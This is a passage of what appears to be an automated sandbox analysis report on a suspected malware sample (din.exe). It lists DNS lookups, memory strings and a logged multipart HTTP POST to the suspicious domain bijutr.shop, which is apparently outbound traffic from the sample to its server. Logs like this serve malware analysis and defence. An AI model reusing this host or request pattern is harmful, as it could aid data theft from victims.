                Source: global traffic | DNS traffic detected: DNS query: jCkYzqqYDalcEKzOzlTGtPWyRfbt.jCkYzqqYDalcEKzOzlTGtPWyRfbt
                Source: global traffic | DNS traffic detected: DNS query: t.me
                Source: global traffic | DNS traffic detected: DNS query: bijutr.shop
                Source: global traffic | DNS traffic detected: DNS query: www.google.com
                Source: global traffic | DNS traffic detected: DNS query: ntp.msn.com
                Source: global traffic | DNS traffic detected: DNS query: bzib.nelreports.net
                Source: global traffic | DNS traffic detected: DNS query: clients2.googleusercontent.com
                Source: global traffic | DNS traffic detected: DNS query: chrome.cloudflare-dns.com
                Source: global traffic | DNS traffic detected: DNS query: sb.scorecardresearch.com
                Source: global traffic | DNS traffic detected: DNS query: assets.msn.com
                Source: unknown | HTTP traffic detected:
                    POST / HTTP/1.1
                    Content-Type: multipart/form-data; boundary=----58Y589HL6P8QIEKNG47Q
                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                    Host: bijutr.shop
                    Content-Length: 255
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                Source: chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1957582472.000033FC00390000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5906
                Source: chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1887499248.000036EC004A0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6041
                Source: chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6048
                Source: chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6141
                Source: chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6248
                Source: chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6439
                Source: chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6651
                Source: chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6651/
                Source: chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6692
                Source: chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6755
                Source: chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6860
                Source: chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6876
                Source: chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6878
                Source: chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6929
                Source: chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6953
                Source: chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1887499248.000036EC004A0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7036
                Source: chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7047
                Source: chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7172
                Source: chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1887499248.000036EC004A0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7279
                Source: chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7370
                Source: chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7406
                Source: chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1957582472.000033FC00390000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7488
                Source: chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7553
                Source: chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7556
                Source: chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1887499248.000036EC004A0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7724
                Source: chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1887499248.000036EC004A0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7760
                Source: chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7761
                Source: chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8162
                Source: chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8215
                Source: chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8229
                Source: chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1887499248.000036EC004A0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8280
                Source: din.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
                Source: din.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCodeSigningCA-1.crt0
                Source: din.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                Source: din.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                Source: din.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                Source: chrome.exe, 00000015.00000002.1887024010.000036EC00300000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://clients2.google.com/time/1/current
                Source: chrome.exe, 00000015.00000002.1888166681.000036EC00674000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=117
                Source: Prizes.0.dr, Centered.com.2.drString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
                Source: Prizes.0.dr, Centered.com.2.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
                Source: Prizes.0.dr, Centered.com.2.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
                Source: Prizes.0.dr, Centered.com.2.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
                Source: Prizes.0.dr, Centered.com.2.drString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
                Source: din.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
                Source: din.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
                Source: din.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                Source: din.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                Source: din.exeString found in binary or memory: http://crl3.digicert.com/assured-cs-g1.crl00
                Source: din.exeString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                Source: din.exeString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
                Source: din.exeString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
                Source: din.exeString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
                Source: din.exeString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                Source: din.exeString found in binary or memory: http://crl4.digicert.com/assured-cs-g1.crl0L
                Source: din.exeString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
                Source: din.exeString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
                Source: chrome.exe, 00000015.00000002.1885745351.000036EC0005B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://google.com/
                Source: msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://issuetracker.google.com/200067929
                Source: chrome.exe, 00000015.00000003.1810575976.000036EC010AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1810894201.000036EC010C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1810519278.000036EC0109C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1810832476.000036EC00F4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://jsbin.com/temexa/4.
                Source: din.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                Source: din.exeString found in binary or memory: http://ocsp.digicert.com0A
                Source: din.exeString found in binary or memory: http://ocsp.digicert.com0C
                Source: din.exeString found in binary or memory: http://ocsp.digicert.com0L
                Source: din.exeString found in binary or memory: http://ocsp.digicert.com0N
                Source: din.exeString found in binary or memory: http://ocsp.digicert.com0O
                Source: Prizes.0.dr, Centered.com.2.drString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
                Source: Prizes.0.dr, Centered.com.2.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
                Source: Prizes.0.dr, Centered.com.2.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
                Source: Prizes.0.dr, Centered.com.2.drString found in binary or memory: http://ocsp2.globalsign.com/rootr606
                Source: chrome.exe, 00000015.00000003.1810575976.000036EC010AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1891087879.000036EC00D98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1813167152.000036EC0100C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1886957092.000036EC002F7000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1812347913.000036EC00A24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1813304700.000036EC01224000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1810894201.000036EC010C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1810519278.000036EC0109C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1810791157.000036EC010FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1812330053.000036EC00CDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1810832476.000036EC00F4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1812535851.000036EC00F94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1812369339.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1813243843.000036EC011A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/AUTHORS.txt
                Source: chrome.exe, 00000015.00000003.1810575976.000036EC010AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1891087879.000036EC00D98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1813167152.000036EC0100C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1886957092.000036EC002F7000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1812347913.000036EC00A24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1813304700.000036EC01224000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1810894201.000036EC010C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1810519278.000036EC0109C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1810791157.000036EC010FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1812330053.000036EC00CDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1810832476.000036EC00F4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1812535851.000036EC00F94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1812369339.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1813243843.000036EC011A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/CONTRIBUTORS.txt
                Source: chrome.exe, 00000015.00000003.1810575976.000036EC010AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1891087879.000036EC00D98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1813167152.000036EC0100C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1886957092.000036EC002F7000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1812347913.000036EC00A24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1813304700.000036EC01224000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1810894201.000036EC010C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1810519278.000036EC0109C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1810791157.000036EC010FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1812330053.000036EC00CDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1810832476.000036EC00F4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1812535851.000036EC00F94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1812369339.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1813243843.000036EC011A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/LICENSE.txt
                Source: chrome.exe, 00000015.00000002.1889610509.000036EC009E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collections?rt=b
                Source: chrome.exe, 00000015.00000002.1888594099.000036EC00748000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/image?rt=b
                Source: chrome.exe, 00000015.00000002.1886568019.000036EC001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients4.google.com/chrome-sync
                Source: chrome.exe, 00000015.00000002.1886568019.000036EC001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients4.google.com/chrome-sync/event
                Source: chrome.exe, 00000015.00000002.1888166681.000036EC00674000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=117
                Source: Centered.com, 00000010.00000002.2511212065.0000000006CFA000.00000004.00000800.00020000.00000000.sdmp, Centered.com, 00000010.00000002.2503014570.00000000019DD000.00000004.00000020.00020000.00000000.sdmp, Z58QQQ.16.drString found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
                Source: Centered.com, 00000010.00000002.2511212065.0000000006CFA000.00000004.00000800.00020000.00000000.sdmp, Centered.com, 00000010.00000002.2503014570.00000000019DD000.00000004.00000020.00020000.00000000.sdmp, Z58QQQ.16.drString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                Source: chrome.exe, 00000015.00000002.1892619156.000036EC00ED8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/gws/cdt1
                Source: chrome.exe, 00000015.00000002.1889850838.000036EC00A88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/report-to/gws/none
                Source: Reporting and NEL.29.drString found in binary or memory: https://deff.nelreports.net/api/report
                Source: 2cc80dabc69f58b6_0.28.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
                Source: Reporting and NEL.29.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msnw
                Source: chrome.exe, 00000015.00000002.1889239936.000036EC00948000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/:
                Source: chrome.exe, 00000015.00000002.1889239936.000036EC00948000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/?usp=installed_webapp
                Source: chrome.exe, 00000015.00000002.1889239936.000036EC00948000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/J
